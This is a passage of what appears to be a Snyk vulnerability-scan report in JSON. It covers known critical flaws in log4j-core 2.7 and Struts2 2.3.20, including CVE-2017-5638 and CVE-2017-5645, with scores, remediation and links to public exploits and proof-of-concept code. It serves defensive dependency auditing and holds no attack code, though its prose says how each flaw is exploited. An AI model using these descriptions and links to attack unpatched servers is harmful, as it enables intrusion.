"cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:27.296331Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.838012Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:08.335550Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:27.296331Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.838012Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.8.2 or higher.\n## References\n- [Exploit](https://github.com/pimps/CVE-2017-5645)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/5dcc19215827db29c993d0305ee2b0d8dd05939d)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-1863)\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2017-5645)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/network/cves/2017/CVE-2017-5645.yaml)\n", - "epssDetails": { - "percentile": "0.98601", - "probability": "0.87384", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-5645" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-fxph-q3j8-mv87" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2017-05-17T12:10:22.545000Z", - "functions_new": [ - { - "version": [ - "[,2.8.2)" - ], - "functionId": { - "className": "org.apache.logging.log4j.core.net.server.TcpSocketServer", - "functionName": "createSerializedSocketServer" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-04-01T21:00:00Z", - "exploitDetails": { - "sources": [ - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Functional", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2017-05-21T07:52:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:27.233939Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.7" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.8.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.7" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", - "title": "Man-in-the-Middle (MitM)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.13.2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.13.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "low", - "cvssScore": 3.7, - "functions": [ - { - "version": [ - "[2.6,2.13.2)" - ], - "functionId": { - "filePath": "org/apache/logging/log4j/core/net/SmtpManager.java", - "className": "SmtpManager", - "functionName": "getSmtpManager" - } - }, - { - "version": [ - "[2.0-rc2,2.5)" - ], - "functionId": { - "filePath": "org/apache/logging/log4j/core/net/SmtpManager.java", - "className": "SmtpManager", - "functionName": "getSMTPManager" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://confluence.atlassian.com/jirakb/list-of-security-vulnerabilities-addressed-in-atlassian-log4j1-1141965553.html", - "title": "Atlassian Patch" - }, - { - "url": "https://github.com/apache/logging-log4j2/commit/6851b5083ef9610bae320bf07e1f24d2aa08851b", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-2819", - "title": "Jira Issue" - }, - { - "url": "https://github.com/qos-ch/reload4j/commit/90bc7826c206c256ee9ec6b51318cc1865cc19e9", - "title": "Reload4j Fix Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "low", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 3.7, - "modificationTime": "2024-03-11T09:51:18.869400Z" - }, - { - "assigner": "Red Hat", - "severity": "low", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 3.7, - "modificationTime": "2024-03-11T09:53:58.100685Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Snyk", - "severity": "low", - "baseScore": 3.7, - "cvssVersion": "3.1", - "modificationTime": "2024-03-14T11:19:13.272608Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "NVD", - "severity": "low", - "baseScore": 3.7, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:18.869400Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Red Hat", - "severity": "low", - "baseScore": 3.7, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.100685Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Man-in-the-Middle (MitM). Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.13.2 or higher.\n## References\n- [Atlassian Patch](https://confluence.atlassian.com/jirakb/list-of-security-vulnerabilities-addressed-in-atlassian-log4j1-1141965553.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/6851b5083ef9610bae320bf07e1f24d2aa08851b)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-2819)\n- [Reload4j Fix Commit](https://github.com/qos-ch/reload4j/commit/90bc7826c206c256ee9ec6b51318cc1865cc19e9)\n", - "epssDetails": { - "percentile": "0.56903", - "probability": "0.00191", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-9488" - ], - "CWE": [ - "CWE-297" - ], - "GHSA": [ - "GHSA-vwqq-5vrc-xw9h" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2020-04-28T15:10:06.231410Z", - "functions_new": [ - { - "version": [ - "[2.6,2.13.2)" - ], - "functionId": { - "className": "org.apache.logging.log4j.core.net.SmtpManager", - "functionName": "getSmtpManager" - } - }, - { - "version": [ - "[2.0-rc2,2.5)" - ], - "functionId": { - "className": "org.apache.logging.log4j.core.net.SmtpManager", - "functionName": "getSMTPManager" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-04-27T17:16:14Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2020-04-28T17:16:14Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-14T11:19:13.272608Z", - "socialTrendAlert": false, - "severityWithCritical": "low", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.7" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.13.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.7" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-1049003", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "Alvaro Munoz", - "Masato Anzai" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.5.26)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.5.26" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-061", - "title": "Apache Security Advisory" - }, - { - "url": "https://github.com/apache/struts/commit/45667346629455f7ea125bff36bf9b763b7e8463", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/phil-fly/CVE-2020-17530", - "title": "PoC" - }, - { - "url": "https://videos.hacking.land/2021/03/apache-struts-vulnerability-cve-2020.html", - "title": "PoC" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-17530.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:50:37.704300Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:56.396718Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:37.704300Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). The vulnerability exists due to improper input validation when processing certain tag's attributes. The application performs double evaluation of the code if a developer applied forced OGNL evaluation by using the `%{...}` syntax. A remote attacker can send a specially crafted request to the application and execute arbitrary code on the target system.\r\n\r\nSuccessful exploitation of this vulnerability may result in complete compromise of vulnerable system.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.26 or higher.\n## References\n- [Apache Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-061)\n- [GitHub Commit](https://github.com/apache/struts/commit/45667346629455f7ea125bff36bf9b763b7e8463)\n- [PoC](https://github.com/phil-fly/CVE-2020-17530)\n- [PoC](https://videos.hacking.land/2021/03/apache-struts-vulnerability-cve-2020.html)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-17530.yaml)\n", - "epssDetails": { - "percentile": "0.99845", - "probability": "0.97257", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-17530" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2020-12-08T19:30:16.810323Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-12-08T19:25:45Z", - "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2020-12-08T19:25:43Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.269995Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5.26" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-2635340", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "credit": [ - "Chris McCown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.5.30)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.5.30" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/b2bfdc5c88a13e82d647e7ae836089a12ce001fe", - "title": "GitHub Commit" - }, - { - "url": "https://securitylab.github.com/research/apache-struts-double-evaluation/", - "title": "GitHub Security Lab - Double Evaluation in Struts" - }, - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-062", - "title": "Struts Security Advisory" - }, - { - "url": "https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html", - "title": "Write Up & PoC" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-31805.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:49:12.874796Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:56.453682Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:12.874796Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). The fix issued for [CVE-2020-17530](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-1049003) was incomplete. Some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the `%{...} syntax`. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.30 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b2bfdc5c88a13e82d647e7ae836089a12ce001fe)\n- [GitHub Security Lab - Double Evaluation in Struts](https://securitylab.github.com/research/apache-struts-double-evaluation/)\n- [Struts Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-062)\n- [Write Up & PoC](https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-31805.yaml)\n", - "epssDetails": { - "percentile": "0.96232", - "probability": "0.18558", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-31805" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2022-04-12T20:32:06.687703Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-04-12T20:27:34Z", - "exploitDetails": { - "sources": [ - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2022-04-12T20:33:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:18.536966Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5.30" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30060", - "title": "Manipulation of Struts' internals", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "credit": [ - "Viettel Information Security Center" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.3.24.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.24.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "http://struts.apache.org/docs/s2-026.html", - "title": "Vulnerability Summary" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:01.496065Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:56.364720Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:49:01.496065Z" - } - ], - "description": "## Overview\n`ValueStack` defines special `top` object which represents root of execution context. It can be used to manipulate Struts' internals or can be used to affect container's settings.\n\n## References\n- [http://struts.apache.org/docs/s2-026.html](http://struts.apache.org/docs/s2-026.html)\n", - "epssDetails": { - "percentile": "0.70008", - "probability": "0.00305", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-5209" - ], - "CWE": [ - "CWE-284" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2016-12-25T16:51:56Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-07-01T16:51:56Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2015-07-01T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:01.496065Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.24.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30207", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Nike Zheng" - ], - "semver": { - "vulnerable": [ - "[2.3.7, 2.3.32)", - "[2.5.0, 2.5.10.1)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.32", - "2.5.10.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 10, - "functions": [ - { - "version": [ - "[2.3.5, 2.3.32)" - ], - "functionId": { - "filePath": "org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java", - "className": "JakartaMultiPartRequest", - "functionName": "buildErrorMessage" - } - }, - { - "version": [ - "[2.5.0, 2.5.10.1)" - ], - "functionId": { - "filePath": "org/apache/struts2/interceptor/FileUploadInterceptor.java", - "className": "FileUploadInterceptor", - "functionName": "intercept" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638", - "title": "CVE Details" - }, - { - "url": "https://exploit-db.com/exploits/41614", - "title": "Exploit DB" - }, - { - "url": "https://www.exploit-db.com/exploits/41570/", - "title": "Exploit DB" - }, - { - "url": "https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/rapid7/metasploit-framework/issues/8064", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/rapid7/metasploit-framework/pull/8072", - "title": "GitHub PR" - }, - { - "url": "https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc", - "title": "PoC" - }, - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-045", - "title": "Struts Wiki" - }, - { - "url": "http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html", - "title": "Talos Intelligence Blog" - }, - { - "url": "https://www.exploit-db.com/exploits/41570", - "title": "Exploit DB" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-5638.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 10, - "modificationTime": "2024-03-11T09:47:26.418639Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:06:03.020507Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:26.418639Z" - } - ], - "description": "## Overview\r\n[`org.apache.struts:struts2-core`](https://cwiki.apache.org/confluence/display/WW/Home) is an elegant, extensible framework for building enterprise-ready Java web applications.\r\n\r\nAffected versions of the package are vulnerable to Arbitrary Command Execution while uploading files with the Jakarta Multipart parser. This particular vulnerability can be exploited by an attacker by sending a crafted request to upload a file to the vulnerable server that uses a Jakarta-based plugin to process the upload request.\r\n\r\nThe attacker can then send malicious code in the `Content-Type`, `Content-Disposition` or `Content-Length` HTTP headers, which will then be executed by the vulnerable server. [A proof of concept](https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc) that demonstrates the attack scenario is publicly available and the vulnerability is being [actively exploited in the wild](https://www.theregister.co.uk/2017/03/09/apache_under_attack_patch_for_zero_day_available/).\r\n\r\nAlthough maintainers of the open source project immediately patched the vulnerability, Struts servers that have yet to install the update remain under attack by hackers who exploit it to inject commands of their choice.\r\n\r\nThis attack can be achieved without authentication. To make matters worse, web applications don't necessarily need to successfully upload a malicious file to exploit this vulnerability, as just the presence of the vulnerable Struts library within an application is enough to exploit the vulnerability.\r\n\r\n## Remediation\r\nUpgrade `org.apache.struts:struts2-core` to version 2.3.32, 2.5.10.1 or higher.\n\n## References\n- [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638)\n- [https://exploit-db.com/exploits/41614](https://exploit-db.com/exploits/41614)\n- [https://www.exploit-db.com/exploits/41570/](https://www.exploit-db.com/exploits/41570/)\n- [https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7](https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7)\n- [https://github.com/rapid7/metasploit-framework/issues/8064](https://github.com/rapid7/metasploit-framework/issues/8064)\n- [https://github.com/rapid7/metasploit-framework/pull/8072](https://github.com/rapid7/metasploit-framework/pull/8072)\n- [https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc](https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc)\n- [https://cwiki.apache.org/confluence/display/WW/S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045)\n- [http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html](http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html)\n", - "epssDetails": { - "percentile": "0.99996", - "probability": "0.97546", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-5638" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-j77q-2qqg-6989" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-03-19T10:28:21.873000Z", - "functions_new": [ - { - "version": [ - "[2.3.5, 2.3.32)" - ], - "functionId": { - "className": "org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest", - "functionName": "buildErrorMessage" - } - }, - { - "version": [ - "[2.5.0, 2.5.10.1)" - ], - "functionId": { - "className": "org.apache.struts2.interceptor.FileUploadInterceptor", - "functionName": "intercept" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-03-05T22:00:00Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2017-03-21T15:30:44Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.313495Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - 